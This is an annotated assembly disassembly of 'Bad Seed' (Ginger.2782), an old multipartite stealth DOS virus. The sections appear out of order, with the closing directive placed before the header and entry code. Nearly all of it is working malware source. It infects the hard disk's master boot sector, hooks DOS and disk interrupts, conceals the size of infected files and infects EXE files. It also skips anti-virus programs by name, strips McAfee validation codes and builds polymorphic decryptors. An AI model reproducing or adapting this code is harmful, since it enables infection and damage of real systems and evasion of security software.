MOV DI, OFFSET Append_Body_Encrypted_Copy
MOV CX, (Decryptor-Append_Body_Encrypted)
REP MOVSB

CLI

XOR AX, AX ; ES = IVT.


MOV ES, AX

LES BX, ES:[(1Ch*4)] ; Get INT 1Ch (timer).

MOV Old_Int1Ch, BX ; Save INT 1Ch.


MOV Old_Int1Ch+2, ES

MOV ES, AX ; ES = IVT.

LES BX, ES:[(21h*4)] ; Get INT 21h.

MOV Old_Int21h, BX ; Save INT 21h aswell.


MOV Old_Int21h+2, ES

MOV ES, AX ; ES = IVT.

; Hook INT 1Ch.

MOV ES:[(1Ch*4)], OFFSET New_Int1Ch


MOV ES:[(1Ch*4)+2], DS

STI

RETF ; Jump to the original MBS.

; This is where the polymorphic decryptor jumps


; to after it's done decrypting the virusbody.

Init_Virus:
CALL Get_IP ; Calculate the virus'
Get_IP: POP SI ; delta offset in this CS.
SUB SI, OFFSET Get_IP

PUSH SI ; Save some needed registers.


PUSH AX
PUSH ES

PUSH CS
POP DS

MOV AX, ES ; AX = current PSP.

; Add the effective segment (PSP) to the segment values.

ADD [SI+(Host_CS-START)], AX
ADD [SI+(Host_SS-START)], AX

DEC AX ; Get the host's MCB in ES.


MOV ES, AX

MOV AX, 0FE02h ; Virus' residency check.


INT 21h
CMP AX, NOT 0FE02h ; Virus is already installed?
JE Run_Host ; Then just bail to the host.

CMP BYTE PTR ES:[0], 'Z' ; Make sure this block is the
JNE Run_Host ; last one in the chain, else
; higher blocks might get
; damaged.

; Make sure the memory block holds enough


; space to put the viruscode in.

CMP WORD PTR ES:[3], Virus_Size_Mem


JBE Run_Host

MOV AX, ES:[12h] ; PSP:[2], holds TOM segment.


SUB AX, Virus_Size_Mem ; Minus the virus' size to
; get the virus segment.

MOV ES, AX ; Virus segment.

XOR DI, DI ; Relocate the viruscode to


MOV CX, Virus_Size ; the newly calculated
CLD ; unused segment.
REP MOVSB

PUSH ES ; DS = virus segment.


POP DS

CALL Infect_MBS ; Infect the 1st MBS.

Run_Host: POP ES ; Restore ES (PSP).


POP AX ; Restore AX (FCB status).

PUSH ES ; DS=ES=PSP.
POP DS

POP SI ; Restore virus delta offset.

; Restore the host's original SS.

MOV SS, CS:[SI+(Host_SS-START)]

; And jump to the host's original entrypoint.

JMP DWORD PTR CS:[SI+(Host_IP-START)]

Infect_MBS:
MOV AH, 2Ah ; Get the current date.
INT 21h

MOV Infect_Year, CX ; Store date of infection.


MOV Infect_MD, DX

MOV AH, 52h ; Get M$-DOS list of lists.


INT 21h ; (undocumented).

MOV AX, ES:[BX-2] ; Get segment of 1st MCB.


MOV First_MCB, AX ; And save it for tunneler.

MOV AX, 3513h ; Get INT 13h.


INT 21h
MOV Old_Int13h, BX ; Save INT 13h.
MOV Old_Int13h+2, ES

MOV AX, 3501h ; Get INT 01h.


INT 21h

MOV SI, BX ; Save INT 01h in DI:SI.


MOV DI, ES

MOV AX, 2501h ; Put in the tunneler.


MOV DX, OFFSET New_Int01h
INT 21h

MOV Tunnel_Success, 0 ; Initialize as 'not found'.

PUSHF ; Set the trapflag (TF).


POP AX
OR AX, 100h
PUSH AX
POPF

MOV AX, 0201h ; Read the MBS of HD 1.


MOV BX, OFFSET Buffer
MOV CX, 1
MOV DX, 80h

PUSH DS
POP ES

PUSHF ; Call INT 13h while tracing.


CALL DWORD PTR Old_Int13h

PUSHF ; Disable the TF incase


POP AX ; INT 13h wasn't found.
AND AX, NOT 100h
PUSH AX
POPF

PUSHF

MOV AX, 2501h ; Restore original INT 01h.


MOV DX, SI
MOV DS, DI
INT 21h

POPF ; Flags after the MBS read.


JNC Check_MBS ; If error, then bail out.

JMP Exit_Inf_MBS

Check_MBS: PUSH ES ; ES = virus segment.


POP DS

; Check if the MBS is already infected.

CMP [BX+(ID_Word-MBS_Loader)], 0FE02h


JNE Find_DOS_Part

JMP Exit_Inf_MBS

; This locates a DOS partition.

Find_DOS_Part: ADD BX, 1BEh ; BX = begin partition table.


MOV CX, 4 ; Maximum of 4 partitions.

Scan_Partition: MOV AL, [BX+4] ; Get the partition's system


; indicator.

CMP AL, 4 ; DOS 16-bit FAT ?


JE Store_Home

CMP AL, 6 ; DOS > 32M ?


JE Store_Home

CMP AL, 1 ; DOS 12-bit FAT ?


JE Store_Home

ADD BX, 16 ; Next partition.

LOOP Scan_Partition ; Loop to the next partition.

JMP Exit_Inf_MBS ; None found.

Store_Home: MOV DL, 80h ; First harddisk.


MOV DH, [BX+5] ; Last head of DOS partition.

MOV Home_HD, DX ; Store virus' home


; drive & head.

MOV AX, [BX+6] ; Last sector & track of


; DOS partition.
MOV CX, AX
MOV SI, Virus_Size_512+1 ; Virus sectors + old MBS.

AND AX, 0000000000111111b ; Strip track count to get


; the last track sector.

CMP AX, SI ; There's enough space on


JBE Exit_Inf_MBS ; this track for the virus?

SUB CX, SI ; Steal needed sectors from


; the partition's last track.
MOV DI, BX
INC CX
MOV Home_ST, CX

MOV AX, 0301h ; Store the MBS on the stolen


MOV BX, OFFSET Buffer ; partition sectors.

PUSHF
CALL DWORD PTR Old_Int13h
JC Exit_Inf_MBS

DEC CX ; Adjust the DOS partition


MOV [DI+6], CX ; to have 6 sectors less.

INC CX

SUB [DI+12], SI ; Adjust the partition sector


SBB WORD PTR [DI+12+2], 0 ; count aswell.

; Write the virusbody to the stolen sectors.

MOV AX, 0300h+Virus_Size_512


MOV BX, 0
INC CX

PUSHF ; INT 13h.


CALL DWORD PTR Old_Int13h
JC Exit_Inf_MBS

; Copy the virus MBS loader into the MBS.

MOV SI, OFFSET MBS_Loader


MOV DI, OFFSET Buffer
MOV CX, (Relocated_Boot-MBS_Loader)
CLD
REP MOVSB

MOV AX, 0301h ; Write the infected MBS


MOV BX, OFFSET Buffer ; to disk.
MOV CX, 1
XOR DH, DH

PUSHF ; INT 13h.


CALL DWORD PTR Old_Int13h

Exit_Inf_MBS: RETN

New_Int01h:
PUSH BP ; Setup a stack pointer.
MOV BP, SP

CMP CS:Tunnel_Success, 1 ; Tunnel already finished?


JE Clear_TF ; *** Pointless code, since
; the TF is already cleared.

CMP [BP+(2*2)], 1234h ; We're in the DOS kernel?


First_MCB = WORD PTR $-2
JA Exit_Int01h

PUSH AX
PUSH ES

LES AX, [BP+(1*2)] ; Get instruction's CS:IP.

MOV CS:Old_Int13h, AX ; Save it.


MOV CS:Old_Int13h+2, ES

MOV CS:Tunnel_Success, 1 ; Mark tunnel successful.

POP ES
POP AX

Clear_TF: AND [BP+(3*2)], NOT 100h ; Disable the trapflag.

Exit_Int01h: POP BP

IRET

New_Int13h:
CMP CX, 1 ; Track 0, sector 1 ?
JNE JMP_Old_Int13h

CMP DX, 80h ; Head 0, of the 1st HD ?


JNE JMP_Old_Int13h
CMP AH, 03h ; Is it a sector write?
JA JMP_Old_Int13h

CMP AH, 02h ; Or a sector read?


JB JMP_Old_Int13h

PUSH CX
PUSH DX

DEC AL ; Only the MBS gets read?


JZ Read_Orig_MBS

PUSH AX
PUSH BX

ADD BX, 512 ; Next sector in buffer.


INC CX ; Next sector.

PUSHF ; Process the other sectors


CALL DWORD PTR CS:Old_Int13h ; first, so the MBS action
; can be redirected to the
; clean one.
POP BX
POP AX

Read_Orig_MBS: MOV AL, 1 ; Just the MBS.

MOV CX, CS:Home_ST ; Load address of original


MOV DX, CS:Home_HD ; MBS.

PUSHF ; Read/write the original


CALL DWORD PTR CS:Old_Int13h ; MBS.

POP DX
POP CX

RETF 2 ; Return with flags.

JMP_Old_Int13h: JMP DWORD PTR CS:Old_Int13h

New_Int1Ch:
PUSH AX
PUSH BX
PUSH ES
PUSH DS

XOR AX, AX ; ES = IVT.


MOV ES, AX

PUSH CS
POP DS

LES BX, ES:[(21h*4)] ; Get INT 21h.

MOV AX, ES ; AX = segment of INT 21h.

CMP AX, 800h ; Is it too high?


JA Exit_Int1Ch ; Then assume DOS ain't
; loaded yet.

CMP AX, Old_Int21h+2 ; Has the DOS segment


JNE Save_Int21h ; changed since boot-up?

CMP BX, Old_Int21h ; Has the DOS offset changed


JE Exit_Int1Ch ; since boot-up?

Save_Int21h: MOV Old_Int21h, BX ; Save INT 21h.


MOV Old_Int21h+2, ES

XOR AX, AX ; DS = IVT.


MOV DS, AX

LES BX, DWORD PTR CS:Old_Int1Ch

MOV DS:[(1Ch*4)], BX ; Restore original INT 1Ch.


MOV DS:[(1Ch*4)+2], ES

LES BX, DS:[(13h*4)] ; Get INT 13h.

MOV CS:Old_Int13h, BX ; Save INT 13h.


MOV CS:Old_Int13h+2, ES

; Hook INT 13h.

MOV DS:[(13h*4)], OFFSET New_Int13h_Copy


MOV DS:[(13h*4)+2], CS

; Hook INT 21h.

MOV DS:[(21h*4)], OFFSET New_Int21h


MOV DS:[(21h*4)+2], CS

Exit_Int1Ch: POP DS
POP ES
POP BX
POP AX

IRET

New_Int21h:
CMP AH, 11h ; Findfirst (FCB) ?
JB Check_Dir_St

CMP AH, 12h ; Findnext (FCB) ?


JA Check_Dir_St

CALL FCB_Stealth ; Carry-out the FCB stealth.

RETF 2 ; Return with flags.

Check_Dir_St: CMP AH, 4Eh ; Findfirst (dir) ?


JB Check_TSR_Test

CMP AH, 4Fh ; Findnext (dir) ?


JA Check_TSR_Test

CALL Dir_Stealth ; Carry-out the dir stealth.

RETF 2 ; Return with flags.

Check_TSR_Test: CMP AX, 0FE02h ; Virus' residency check?


JNE Check_Message
NOT AX ; Return TSR mark.

IRET ; Return to the caller.

Check_Message: CMP AX, 0FE03h ; Call to display message?


JNE Check_Exec

CMP CS:Infect_Year, 0 ; The date was correct?


JNZ JMP_Old_Int21h ; Else just ignore the call.

CALL Display_Message

IRET

Check_Exec: CMP AX, 4B00h ; Program execute?


JE Init_Stack

CMP AH, 4Ch ; Program terminate?


JNE JMP_Old_Int21h

Init_Stack: MOV CS:Old_SP, SP ; Save the current stack.


MOV CS:Old_SS, SS

CLI ; Setup own stack.


PUSH CS
POP SS
MOV SP, OFFSET Validate_Header+128
STI

CMP AH, 4Ch ; Was it program terminate?


JNE Do_Infect_File

CALL Check_Activate

JMP Restore_Stack

Do_Infect_File: CALL Infect_File

Restore_Stack: CLI ; Restore the original stack.


MOV SS, CS:Old_SS
MOV SP, CS:Old_SP
STI

JMP $+2 ; *** Pointless instruction.

JMP_Old_Int21h: INC CS:Int_Count ; Update random counter.

JMP DWORD PTR CS:Old_Int21h

New_Int24h:
MOV AL, 03h ; Fail operation.
IRET

FCB_Stealth:
PUSH BX
PUSH ES

PUSH AX

MOV AH, 2Fh ; Get current DTA.


CALL Do_Old_Int21h
POP AX

PUSHF ; Execute the call.


CALL DWORD PTR CS:Old_Int21h

PUSHF
PUSH AX

CMP AL, -1 ; Error?


JE Exit_FCB_St ; Then get out.

CMP ES:[BX.FCB_Drive], -1 ; Is it an extended FCB ?


JNE Get_FCB_Time

ADD BX, 7 ; Then skip extended stuff.

Get_FCB_Time: MOV AL, BYTE PTR ES:[BX.FCB_Time]

AND AL, 00011111b ; Mask-out seconds value.

CMP AL, (62/2) ; File is infected?


JNE Exit_FCB_St

; Restore the original filesize.

SUB ES:[BX.FCB_Size], Virus_Size


SBB ES:[BX.FCB_Size+2], 0

Exit_FCB_St: POP AX
POPF

POP ES
POP BX

RETN

Dir_Stealth:
PUSH BX
PUSH ES

PUSH AX

MOV AH, 2Fh ; Get current DTA.


CALL Do_Old_Int21h

POP AX

PUSHF ; Execute the call.


CALL DWORD PTR CS:Old_Int21h

PUSHF
PUSH AX
JC Exit_Dir_St ; Get out if error.

MOV AL, BYTE PTR ES:[BX.Dir_Time]

AND AL, 00011111b ; Mask-out seconds value.

CMP AL, (62/2) ; File is infected?


JNE Exit_Dir_St
; Restore original filesize.

SUB ES:[BX.Dir_Size], Virus_Size


SBB ES:[BX.Dir_Size+2], 0

Exit_Dir_St: POP AX
POPF

POP ES
POP BX

RETN

Write_File:
MOV AH, 40h ; Write to file.
JMP Do_Read_Write

Read_File:
MOV AH, 3Fh ; Read from file.
Do_Read_Write: CALL Load_BX_Int21h
JC Exit_Re_Wr ; If error then exit with CF.

SUB AX, CX ; Set's CF if not all bytes


; were read.
Exit_Re_Wr: RETN

Seek_EOF:
XOR CX, CX ; Seeks to end of file.
XOR DX, DX
Seek_EOF_Rel: MOV AX, 4202h ; Seeks EOF relative.
JMP Load_BX_Int21h

Seek_BOF:
XOR CX, CX ; Seeks to begin of file.
XOR DX, DX
MOV AX, 4200h
Load_BX_Int21h: MOV BX, CS:File_Handle ; Load the filehandle.

Do_Old_Int21h: CLI ; Do the DOS call.


PUSHF
CALL DWORD PTR CS:Old_Int21h

RETN

Infect_File:
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS

CALL Check_File_Name ; Filename can't contain 'SC'


JNC Init_Infect ; or a 'V'.

JMP Exit_Infect
Init_Infect: PUSH DX
PUSH DS

PUSH CS
POP DS

MOV AX, 3524h ; Get INT 24h.


CALL Do_Old_Int21h

MOV Old_Int24h, BX ; Save it.


MOV Old_Int24h+2, ES

MOV AX, 2524h ; Install own INT 24h.


MOV DX, OFFSET New_Int24h
CALL Do_Old_Int21h

POP DS ; File path.


POP DX

MOV AX, 4300h ; Get file's attributes.


CALL Do_Old_Int21h

MOV CS:Old_Attr, CX ; Save attributes.

JNC Blank_Attr

DB 0E9h, 7Eh, 0

; * JMP Restore_Int24h *

Blank_Attr: MOV AX, 4301h ; Blank file attributes.


XOR CX, CX
CALL Do_Old_Int21h
JC Restore_Int24h

MOV AX, 3D02h ; Open the file read/write.


CALL Do_Old_Int21h
JC Restore_Attr

PUSH DX
PUSH DS

PUSH CS
POP DS

MOV File_Handle, AX ; Save the filehandle.

MOV AX, 5700h ; Get file's date & time.


CALL Load_BX_Int21h
JC Restore_Date

MOV Old_File_Date, DX ; Save them.


MOV Old_File_Time, CX

CALL Seek_BOF ; Seek to the start of the


; file. *** file pointer is
; already at BOF.

MOV DX, OFFSET Header ; Read the file's header.


MOV CX, 28 ; *** Reading in more than
CALL Read_File ; needed.
JC Restore_Date
PUSH DS
POP ES

MOV DI, OFFSET Check_Activate


MOV CX, 32

CMP Header.EXE_ID, 'ZM' ; It's an .EXE-file?


JNE Restore_Date ; If not, abort infect.

MOV AX, Header.Checksum ; See if the checksum matches


CLD ; a semi-random word in the
REPNE SCASW ; viruscode.
JNE Check_Validate

OR Old_File_Time, (62/2) ; *** Infected files already


; have 62 seconds.
JMP Restore_Date

Check_Validate: CALL Remove_Validate ; Remove McAfee validation


JC Restore_Date ; shit.

CALL Add_Virus ; Add the virus to the file.

Restore_Date: MOV AX, 5701h ; Restore file's date & time.


MOV DX, Old_File_Date
MOV CX, Old_File_Time
CALL Load_BX_Int21h

MOV AH, 3Eh ; Close the file.


CALL Load_BX_Int21h

POP DS ; File path.


POP DX

Restore_Attr: MOV AX, 4301h ; Restore file's original


MOV CX, CS:Old_Attr ; attributes.
CALL Do_Old_Int21h

Restore_Int24h: MOV AX, 2524h ; Restore original INT 24h.


LDS DX, DWORD PTR CS:Old_Int24h
CALL Do_Old_Int21h

Exit_Infect: POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX

RETN

; Returns CF when the filename holds 'SC' or a 'V', this includes most
; anti-virus programs, SCAN, TBSCAN, VIRSCAN, CPAV, NAV, IBMAV, etc.
Check_File_Name:
PUSH DS
POP ES

MOV DI, DX ; Find the end of the string.


MOV CX, -1
XOR AL, AL
CLD
REPNE SCASB

NOT CX ; CX = length of entire path.

MOV DI, DX

MOV AX, 'CS' ; 'SC'.

MOV SI, CX

Find_SCan: SCASW ; Found 'SC' ?


JE Bad_File_Name ; Then bail.

DEC DI ; We're doing bytes.

LOOP Find_SCan

MOV CX, SI ; Search for a 'V'.


MOV DI, DX
MOV AL, 'V'
REPNE SCASB
JE Bad_File_Name

; *** It would have been better if only the filename


; was searched instead of the entire path.

Good_File_Name: CLC ; Filename is OK.

RETN

Bad_File_Name: STC ; Filename ain't OK!

RETN

; Removes a possible McAfee validation code from the file.


Remove_Validate:
MOV CX, -1 ; Seek to the last 10 bytes.
MOV DX, -10
CALL Seek_EOF_Rel

MOV DX, OFFSET Validate_Header ; Read 8 from there.


MOV CX, 8
CALL Read_File
JC Exit_Remove_Va

CMP Validate_Header, 0FDF0h ; Check for the signature.


JNE Not_Protected

CMP Validate_Header+2, 0AAC5h


JNE Not_Protected

MOV CX, -1 ; Seek to the last 9 bytes.


MOV DX, -9
CALL Seek_EOF_Rel

; Trash signature.

MOV DX, OFFSET Validate_Header+6


MOV CX, 4
CALL Write_File
Exit_Remove_Va: RETN

Not_Protected: CLC

RETN

Add_Virus:
CALL Seek_EOF

MOV SI, AX ; DI:SI = old filesize.


MOV DI, DX

MOV BX, OFFSET Header

MOV AX, [BX.File_512_Pages] ; Calculate 512-byte pages


MUL Word_512 ; of the file.

SUB AX, SI ; Physical size exceeds image


SBB DX, DI ; size? Then it's usually an
JNC Calc_Hdr_Size ; overlay, so bug out.

JMP Exit_Add_Virus

Calc_Hdr_Size: MOV AX, [BX.Header_Size] ; Calculate headersize.


MUL Word_16

SUB SI, AX ; DI:SI = imagesize.


SBB DI, DX

MOV AX, [BX.Program_SS] ; Save file's original SS.


MOV Host_SS, AX
ADD Host_SS, (256/16) ; Add PSP size.

MUL Word_16 ; DX:AX = SS in bytes.

ADD AX, [BX.Program_SP] ; Plus SP value.


; *** Missing a ADC DX, 0.

SUB AX, SI ; Stack points inside the


SBB DX, DI ; program image?
JC Save_CS

SUB AX, 128 ; Original program must have


SBB DX, 0 ; atleast 128 bytes of stack.
JC Exit_Add_Virus ; Else get out.

; Adjust the stack so the viruscode


; doesn't get overwritten.

ADD [BX.Program_SS], (Virus_Size+15)/16

Save_CS: MOV AX, [BX.Program_CS] ; Old CS.


ADD AX, (256/16) ; Add size of PSP.

MOV Host_CS, AX ; Save CS.

MOV AX, [BX.Program_IP] ; Save IP.


MOV Host_IP, AX

CALL Seek_EOF
ADD AX, Virus_Size ; Calculate size after
ADC DX, 0 ; infection.

DIV Word_512 ; Calculate imagesize.

INC AX ; Round upwards.

; Set new imagesize.

MOV Header.File_512_Pages, AX
MOV Header.Image_Mod_512, DX

MOV DX, DI ; DI:SI = old imagesize.


MOV AX, SI
DIV Word_16 ; Calculate new CS:IP.

MOV Header.Program_CS, AX ; Set new CS.

MOV BX, DX ; BX = new IP.

ADD DX, OFFSET Decryptor ; Set new IP.


MOV Header.Program_IP, DX

CALL Poly_Engine ; Add a polymorphic virus


JC Exit_Add_Virus ; copy to the host.

OR Old_File_Time, (62/2) ; Mark the file as infected


; by setting the second value
; to an invalid setting.

MOV BX, Int_Count ; Random counter.


AND BX, 00011111b ; 0 - 31.
SHL BX, 1 ; MUL 2 (for word index).

; Put a semi-random word from the viruscode in the


; header's checksum field to mark the infection.

MOV AX, [(Check_Activate-START)+BX]


MOV Header.Checksum, AX

CALL Seek_BOF

MOV CX, 28 ; Write the updated header


MOV DX, OFFSET Header ; to the target.
CALL Write_File

Exit_Add_Virus: RETN

; The decryptors being generated are quite simple, they are effectively
; enough against pure signature scanners, though can be found with a simple
; algorithmic approach. A pecularity is that the decryptors use themselves
; as a key, which drastically complicates debugging.

Poly_Engine:
PUSH BP

XOR AH, AH ; Get BIOS tick count.


INT 1Ah

MOV AX, DX
MOV BP, DX ; BP is used as a pointer to
; random data.
PUSH DS
POP ES

MOV DI, OFFSET Decryptor ; Fill the decryptor area


MOV SI, DI ; with a random word.
MOV CX, (64/2)
CLD
REP STOSW

XOR DX, DX ; Zero ES.


MOV ES, DX

CALL Make_Load_DS ; Construct the decryptor.


CALL Make_Load_Ptr
CALL Make_Decr_Loop

MOV BYTE PTR [SI], 0E9h ; JMP 16-bit displacement.

MOV DI, OFFSET Init_Virus ; Calculate displacement


SUB DI, SI ; to Init_Virus.
SUB DI, 3

INC SI

MOV [SI], DI ; Set displacement.

MOV AX, OFFSET Append_Body_Encrypted_Copy


CALL AX

POP BP

RETN

Make_Load_DS:
DEC BP ; Adjust random pointer.
; *** Not needed as this is
; the first reference to it.

TEST BYTE PTR ES:[BP], 00000010b ; Test a random bit.


JNZ Make_Load_DS_2

Make_Load_DS_1: MOV BYTE PTR [SI], 0Eh ; PUSH CS


INC SI

CALL Add_Junk ; Add a garbage instruction.

MOV BYTE PTR [SI], 1Fh ; POP DS


INC SI

CALL Add_Junk

RETN

Make_Load_DS_2: MOV [SI], 0CB8Ch ; MOV BX, CS


INC SI
INC SI

CALL Add_Junk

MOV [SI], 0DB8Eh ; MOV DS, BX


INC SI
INC SI
CALL Add_Junk

RETN

Make_Load_Ptr:
AND CH, 11111110b ; BX is start code.
; *** CX is already zero.
DEC BP

TEST BYTE PTR ES:[BP], 00000010b


JZ Make_MOV_BX

OR CH, 00000001b ; SI is start code.

Make_MOV_SI: MOV BYTE PTR [SI], 0BEh ; MOV SI, xxxx


INC SI

MOV [SI], BX ; Start virus in CS or


INC SI ; start decryptor in CS.
INC SI

CALL Add_Junk

ADD BX, OFFSET Decryptor

TEST CH, 00000001b ; BX is start code?


JZ Make_Counter

Make_MOV_BX: MOV BYTE PTR [SI], 0BBh ; MOV BX, xxxx


INC SI

MOV [SI], BX ; Start virus in CS or


INC SI ; start decryptor in CS.
INC SI

CALL Add_Junk

ADD BX, OFFSET Decryptor

TEST CH, 00000001b ; BX is start code?


JZ Make_MOV_SI ; Then use SI as start
; decryptor.

Make_Counter: SUB BX, OFFSET Decryptor ; Restore BX to virus offset.

CALL Add_Junk

; CX is always the counter register.

MOV BYTE PTR [SI], 0B9h ; MOV CX, xxxx


INC SI

MOV AX, OFFSET Decryptor

MOV [SI], AX ; Size of encrypted code.


INC SI
INC SI

CALL Add_Junk
CALL Add_Junk
RETN

Make_Decr_Loop:
MOV AH, 14h ; DL, [SI]
MOV DH, 17h ; DL, [BX]

TEST CH, 00000001b ; BX is start of code?


JZ Make_Load_Byte ; Yeah.

XCHG AH, DH ; Else SI is.

Make_Load_Byte: MOV DI, SI ; Save start decrypt in DI.

MOV AL, 8Ah ; MOV reg8

MOV [SI], AX ; MOV DL, [SI]/[BX]


INC SI
INC SI

CALL Add_Junk

XOR DL, DL ; ADD BYTE PTR

; Initialize the encryptor.

MOV BYTE PTR DS:[Append_Body_Encrypted_Copy+(Encryptor-


Append_Body_Encrypted)], 28h ; SUB BYTE PTR

DEC BP

TEST BYTE PTR ES:[BP], 00000010b


JZ Store_Decrypt

MOV DL, 30h ; XOR BYTE PTR

; Initialize the encryptor.

MOV BYTE PTR DS:[Append_Body_Encrypted_Copy+(Encryptor-


Append_Body_Encrypted)], DL

Store_Decrypt: MOV [SI], DX ; Store decrypt instruction.


INC SI
INC SI

MOV [SI], 4346h ; INC SI / INC BX


INC SI
INC SI

CALL Add_Junk

MOV AX, 0FE81h ; CMP SI, xxxx


MOV CL, 0BEh ; MOV SI, xxxx

TEST CH, 00000001b ; BX is start of code?


JZ Make_CMP_End ; Yip-yip.

MOV AH, 0FBh ; CMP BX, xxxx


MOV CL, 0BBh ; MOV BX, xxxx

Make_CMP_End: MOV [SI], AX ; Make CMP end_decryptor.


INC SI
INC SI
PUSH BX

ADD BX, 64 ; Offset decryptor + fixed


; size of decryptor.

MOV [SI], BX ; (end of decryptor).


INC SI
INC SI

POP BX ; Start of code.

MOV BYTE PTR [SI], 72h ; JB xx


INC SI

MOV DX, SI ; DX = displacement patch


; offset.
INC SI

CALL Add_Junk

MOV [SI], CL ; MOV BX/SI, xxxx


INC SI

MOV [SI], BX ; Start decryptor.


INC SI
INC SI

MOV AX, SI ; Calculate displacement


SUB AX, DX ; between DX and SI.
DEC AX

MOV BX, DX ; JB displacement offset.


MOV [BX], AL ; Patch it.

CALL Add_Junk
CALL Add_Junk

MOV BYTE PTR [SI], 0E2h ; LOOP xx


INC SI

SUB DI, SI ; Displacement between here


DEC DI ; and start decrypt loop.

MOV AX, DI

MOV [SI], AL ; Store displacement.


INC SI

CALL Add_Junk

RETN

Add_Junk:
DEC BP

TEST BYTE PTR ES:[BP], 00001111b


JZ Exit_Add_Junk

DEC BP
MOV AL, ES:[BP]
TEST AL, 00000010b
JZ Junk_CMP

TEST AL, 00000100b


JZ Junk_TEST

TEST AL, 00001000b


JZ Junk_NOP

MOV [SI], 0C789h ; MOV DI, AX


INC SI
INC SI

JMP Exit_Add_Junk

Junk_NOP: MOV BYTE PTR [SI], 90h ; NOP


INC SI

JMP Exit_Add_Junk

Junk_TEST: MOV AL, 85h ; TEST r16

Make_Operand: DEC BP
MOV AH, ES:[BP]

TEST AH, 00000010b


JZ Set_reg_reg

DEC AL ; r16 -> r8.

Set_reg_reg: OR AH, 11000000b ; reg/reg operation.

MOV [SI], AX ; Store junk instruction.


INC SI
INC SI

JMP Exit_Add_Junk

Junk_CMP: DEC BP

TEST BYTE PTR ES:[BP], 00000010b


JZ Junk_CLD

MOV AL, 39h ; CMP r16, r16


JMP Make_Operand

Junk_CLD: MOV BYTE PTR [SI], 0FCh ; CLD


INC SI

Exit_Add_Junk: RETN

Append_Body_Encrypted:

CALL Crypt_Virus

MOV AH, 40h


MOV BX, File_Handle
MOV DX, 0
MOV CX, Virus_Size

PUSHF
CALL DWORD PTR Old_Int21h
JC Crypt_Loop

SUB AX, CX

Crypt_Loop: PUSHF

CMP byte ptr ds:Append_Body_Encrypted_Copy+(Encryptor-


Append_Body_Encrypted), 28h ; SUB
JNE Do_Crypt_Virus

MOV byte ptr ds:Append_Body_Encrypted_Copy+(Encryptor-


Append_Body_Encrypted), 0
Do_Crypt_Virus: CALL Crypt_Virus

POPF

RETN

Crypt_Virus:
MOV BX, 0
MOV SI, OFFSET Decryptor
MOV CX, OFFSET Decryptor

Crypt_Byte: MOV DL, [SI] ; Get key from the decryptor.

XOR [BX], DL ; Encrypt/decrypt byte.


Encryptor = BYTE PTR $-2

INC SI
INC BX

CMP SI, OFFSET Old_Int13h


JB Loop_Crypt_B

MOV SI, OFFSET Decryptor

Loop_Crypt_B: LOOP Crypt_Byte

RETN

Decryptor:
PUSH CS

TEST CL, BL

POP DS ; Load DS with CS.

MOV BX, 0

TEST SP, AX

MOV SI, OFFSET Decryptor ; Decryptor pointer.

CLD

TEST CH, BL

MOV CX, OFFSET Decryptor ; Count to decrypt.

TEST AX, CX
Decrypt_Byte: MOV DL, [SI] ; Get the key from the
; decryptor.

DB 039h, 0D8h

; * CMP AX, BX *

XOR [BX], DL ; Decrypt byte.

INC SI ; Update code & decryptor


INC BX ; pointers.

NOP

CMP SI, OFFSET Old_Int13h ; Completely ran over the


JB Decrypt_Loop ; decryptor?

NOP

MOV SI, OFFSET Decryptor ; Then reload the pointer.

Decrypt_Loop: NOP

LOOP Decrypt_Byte ; Decrypt all bytes.

CLD

JMP Init_Virus ; Jump to the real start.

ORG Decryptor+64 ; Pad decryptor size.

Old_Int13h DW 0, 0

End_Body:

Buffer:

File_Handle DW 0
Old_SP DW 0
Old_SS DW 0
Old_Attr DW 0
Old_File_Date DW 0
Old_File_Time DW 0
Old_Int1Ch DW 0, 0
Old_Int21h DW 0, 0
Old_Int24h DW 0, 0
Int_Count DW 0

New_Int13h_Copy:

DB (New_Int1Ch-New_Int13h) DUP(0)

Append_Body_Encrypted_Copy:

DB (Decryptor-Append_Body_Encrypted) DUP(0)

Header DW 14 DUP(0)

Validate_Header DW 4 DUP(0)

ORG Buffer+512
End_Heap:
Carrier:
MOV AX, 4C00h
INT 21h

EXE_Header STRUC
EXE_ID DW 0
Image_Mod_512 DW 0
File_512_Pages DW 0
Reloc_Items DW 0
Header_Size DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS

Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0)
FCB_Ext DB 3 DUP(0)
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0
Find_FN_FCB ENDS

Find_FN_Dir STRUC
Dir_Reserved DB 21 DUP(0)
Dir_Attr DB 0
Dir_Time DW 0
Dir_Date DW 0
Dir_Size DW 0, 0
Dir_Name DB 13 DUP(0)
Find_FN_Dir ENDS

END Init_Virus
; Bad Seed (Ginger.2782) disasm.
; Multipartite full-stealth MBS/COM/EXE.
; Quite a good virus for it's time (1992), yet the coding style could be
; made more compact, and it's buggy aswell.
; Bugs marked with '***'.
; T-2000/IR, February 2000 - September 2000.

.MODEL TINY
.CODE

Virus_Size EQU (End_Body-START)


Virus_Size_512 EQU ((End_Body-START)+511)/512
Virus_Size_1024 EQU 3
COM EQU 1
EXE EQU 0
Boot EQU 0
File EQU 1

START:
CALL File_Entry

Boot_Loader: ; *** This code assumes DS = 0, which


; does not necessarly have to be the case.

; Restore original word that was temporary


; replaced with the 55AAh bootmarker.

MOV WORD PTR DS:[7C00h+510], 0


Original_Word = WORD PTR $-2

; Steal 3k of DOS memory to hide the virus in.

SUB WORD PTR DS:[413h], Virus_Size_1024

INT 12h ; Get new DOS memory size.

MOV CL, 6 ; Calculate segment where to


SHL AX, CL ; hide.

MOV ES, AX ; ES = virus segment.

; Read rest of virusbody off disk.

MOV AX, 0200h+(Virus_Size_512-1)


MOV BX, 512+3
MOV CX, 3
INT 13h

MOV AL, 0E8h ; CALL xxxx opcode.


XOR DI, DI ; A call to the entrypoint
CLD ; for file infections.
STOSB

MOV AX, (File_Entry-Boot_Loader)


STOSW

MOV CX, (512/2) ; Copy virus bootsector


MOV SI, 7C00h ; too to virus segment.
REP MOVSW

; Initialize some variables.


MOV ES:Ofs_Old_Int13h, OFFSET Old_Int13h
